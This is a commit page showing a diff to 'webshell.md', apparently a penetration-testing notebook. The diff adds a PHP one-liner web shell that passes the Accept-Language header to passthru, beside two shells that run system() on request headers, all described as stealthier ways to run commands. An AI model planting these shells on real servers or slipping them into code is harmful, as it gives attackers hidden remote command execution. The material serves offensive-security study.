Commit 3d73c134 authored by bobloblaw's avatar bobloblaw
Browse files

Updates webshell.md

Auto commit by GitBook Editor
parent 7ed20796
Loading
Loading
Loading
Loading
+3 −0
Original line number Diff line number Diff line
@@ -54,6 +54,9 @@ We can make the commands from above a bit more stealthy. Instead of passing the
```php
<?php system($_SERVER['HTTP_ACCEPT_LANGUAGE']); ?>
<?php system($_SERVER['HTTP_USER_AGENT'])?>

# I have had to use this one
<?php echo passthru($_SERVER['HTTP_ACCEPT_LANGUAGE']); ?>
```

### Obfuscation